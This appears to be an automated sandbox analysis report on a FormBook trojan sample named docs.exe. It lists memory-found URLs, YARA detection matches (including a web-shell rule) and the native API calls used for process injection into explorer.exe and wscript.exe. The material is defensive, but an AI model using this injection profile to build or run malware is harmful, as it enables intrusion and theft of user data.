          Source: explorer.exe, 00000006.00000002.4608809096.0000000010C8F000.00000004.80000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4590765350.00000000054DF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.docs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.docs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 5.2.docs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.docs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.docs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.docs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.docs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.docs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: docs.exe PID: 2672, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: docs.exe PID: 4620, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
          Source: Process Memory Space: wscript.exe PID: 2224, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0041A330 NtCreateFile,5_2_0041A330
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0041A3E0 NtReadFile,5_2_0041A3E0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0041A460 NtClose,5_2_0041A460
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0041A510 NtAllocateVirtualMemory,5_2_0041A510
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0041A2EA NtCreateFile,5_2_0041A2EA
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0041A32A NtCreateFile,5_2_0041A32A
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0041A3DA NtReadFile,5_2_0041A3DA
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0041A45E NtClose,5_2_0041A45E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0041A50A NtAllocateVirtualMemory,5_2_0041A50A
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82AD0 NtReadFile,LdrInitializeThunk,5_2_00F82AD0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_00F82BF0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82B60 NtClose,LdrInitializeThunk,5_2_00F82B60
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_00F82CA0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_00F82C70
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_00F82DF0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82DD0 NtDelayExecution,LdrInitializeThunk,5_2_00F82DD0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_00F82D30
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82D10 NtMapViewOfSection,LdrInitializeThunk,5_2_00F82D10
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_00F82EA0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_00F82E80
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82FE0 NtCreateFile,LdrInitializeThunk,5_2_00F82FE0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82FB0 NtResumeThread,LdrInitializeThunk,5_2_00F82FB0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82F90 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00F82F90
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82F30 NtCreateSection,LdrInitializeThunk,5_2_00F82F30
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F84340 NtSetContextThread,5_2_00F84340
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F84650 NtSuspendThread,5_2_00F84650
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82AF0 NtWriteFile,5_2_00F82AF0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82AB0 NtWaitForSingleObject,5_2_00F82AB0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82BE0 NtQueryValueKey,5_2_00F82BE0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82BA0 NtEnumerateValueKey,5_2_00F82BA0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82B80 NtQueryInformationFile,5_2_00F82B80
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82CF0 NtOpenProcess,5_2_00F82CF0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82CC0 NtQueryVirtualMemory,5_2_00F82CC0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82C60 NtCreateKey,5_2_00F82C60
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82C00 NtQueryInformationProcess,5_2_00F82C00
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82DB0 NtEnumerateKey,5_2_00F82DB0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82D00 NtSetInformationFile,5_2_00F82D00
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82EE0 NtQueueApcThread,5_2_00F82EE0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82E30 NtWriteVirtualMemory,5_2_00F82E30
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82FA0 NtQuerySection,5_2_00F82FA0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F82F60 NtCreateProcessEx,5_2_00F82F60
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F83090 NtSetValueKey,5_2_00F83090
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F83010 NtOpenDirectoryObject,5_2_00F83010
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F835C0 NtCreateMutant,5_2_00F835C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F839B0 NtGetContextThread,5_2_00F839B0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F83D70 NtOpenThread,5_2_00F83D70
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F83D10 NtOpenProcessToken,5_2_00F83D10
          Source: C:\Windows\explorer.exeCode function: 6_2_0FE94232 NtCreateFile,6_2_0FE94232
          Source: C:\Windows\explorer.exeCode function: 6_2_0FE95E12 NtProtectVirtualMemory,6_2_0FE95E12
          Source: C:\Windows\explorer.exeCode function: 6_2_0FE95E0A NtProtectVirtualMemory,6_2_0FE95E0A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_04AD2CA0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2C60 NtCreateKey,LdrInitializeThunk,8_2_04AD2C60
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_04AD2C70
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_04AD2DF0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2DD0 NtDelayExecution,LdrInitializeThunk,8_2_04AD2DD0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2D10 NtMapViewOfSection,LdrInitializeThunk,8_2_04AD2D10
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_04AD2EA0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2FE0 NtCreateFile,LdrInitializeThunk,8_2_04AD2FE0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2F30 NtCreateSection,LdrInitializeThunk,8_2_04AD2F30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2AD0 NtReadFile,LdrInitializeThunk,8_2_04AD2AD0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2BE0 NtQueryValueKey,LdrInitializeThunk,8_2_04AD2BE0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_04AD2BF0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2B60 NtClose,LdrInitializeThunk,8_2_04AD2B60
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD35C0 NtCreateMutant,LdrInitializeThunk,8_2_04AD35C0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD4650 NtSuspendThread,8_2_04AD4650
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD4340 NtSetContextThread,8_2_04AD4340
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2CF0 NtOpenProcess,8_2_04AD2CF0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2CC0 NtQueryVirtualMemory,8_2_04AD2CC0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2C00 NtQueryInformationProcess,8_2_04AD2C00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2DB0 NtEnumerateKey,8_2_04AD2DB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2D30 NtUnmapViewOfSection,8_2_04AD2D30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2D00 NtSetInformationFile,8_2_04AD2D00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2E80 NtReadVirtualMemory,8_2_04AD2E80
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2EE0 NtQueueApcThread,8_2_04AD2EE0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2E30 NtWriteVirtualMemory,8_2_04AD2E30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2FA0 NtQuerySection,8_2_04AD2FA0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2FB0 NtResumeThread,8_2_04AD2FB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2F90 NtProtectVirtualMemory,8_2_04AD2F90
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2F60 NtCreateProcessEx,8_2_04AD2F60
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2AB0 NtWaitForSingleObject,8_2_04AD2AB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2AF0 NtWriteFile,8_2_04AD2AF0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2BA0 NtEnumerateValueKey,8_2_04AD2BA0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD2B80 NtQueryInformationFile,8_2_04AD2B80
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD3090 NtSetValueKey,8_2_04AD3090
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD3010 NtOpenDirectoryObject,8_2_04AD3010
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD3D10 NtOpenProcessToken,8_2_04AD3D10
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD3D70 NtOpenThread,8_2_04AD3D70
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04AD39B0 NtGetContextThread,8_2_04AD39B0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_02A1A3E0 NtReadFile,8_2_02A1A3E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_02A1A330 NtCreateFile,8_2_02A1A330
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_02A1A460 NtClose,8_2_02A1A460
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_02A1A510 NtAllocateVirtualMemory,8_2_02A1A510
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_02A1A2EA NtCreateFile,8_2_02A1A2EA
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_02A1A3DA NtReadFile,8_2_02A1A3DA
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_02A1A32A NtCreateFile,8_2_02A1A32A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_02A1A45E NtClose,8_2_02A1A45E
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_02A1A50A NtAllocateVirtualMemory,8_2_02A1A50A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049AA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,8_2_049AA036
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049A9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,8_2_049A9BAF
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049AA042 NtQueryInformationProcess,8_2_049AA042
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_049A9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_049A9BB2
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_013BE12C0_2_013BE12C
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548C3F80_2_0548C3F8
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548B2280_2_0548B228
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548D2E00_2_0548D2E0
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548FCE00_2_0548FCE0
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548FA880_2_0548FA88
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_054895790_2_05489579
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_054895880_2_05489588
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548F4690_2_0548F469
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548F4780_2_0548F478
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548F6080_2_0548F608
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548F6180_2_0548F618
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548E1F90_2_0548E1F9
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548E0080_2_0548E008
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548C3E80_2_0548C3E8
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548E2080_2_0548E208
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548B2180_2_0548B218
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548A2100_2_0548A210
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548A2200_2_0548A220
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548D2CA0_2_0548D2CA
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548EDC80_2_0548EDC8
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548EDD80_2_0548EDD8
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548FCD10_2_0548FCD1
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548DFF80_2_0548DFF8
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548B9800_2_0548B980
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548B9900_2_0548B990
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548F8680_2_0548F868
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548F8780_2_0548F878
          Source: C:\Users\user\Desktop\docs.exeCode function: 0_2_0548FA790_2_0548FA79
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0041D89D5_2_0041D89D
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0041DA885_2_0041DA88
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0041DBA85_2_0041DBA8
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00402D875_2_00402D87
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00409E5B5_2_00409E5B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00409E605_2_00409E60
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0041DFD55_2_0041DFD5
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0041E7925_2_0041E792
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_010041A25_2_010041A2
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_010101AA5_2_010101AA
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_010081CC5_2_010081CC
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE20005_2_00FE2000
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD81585_2_00FD8158
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEA1185_2_00FEA118
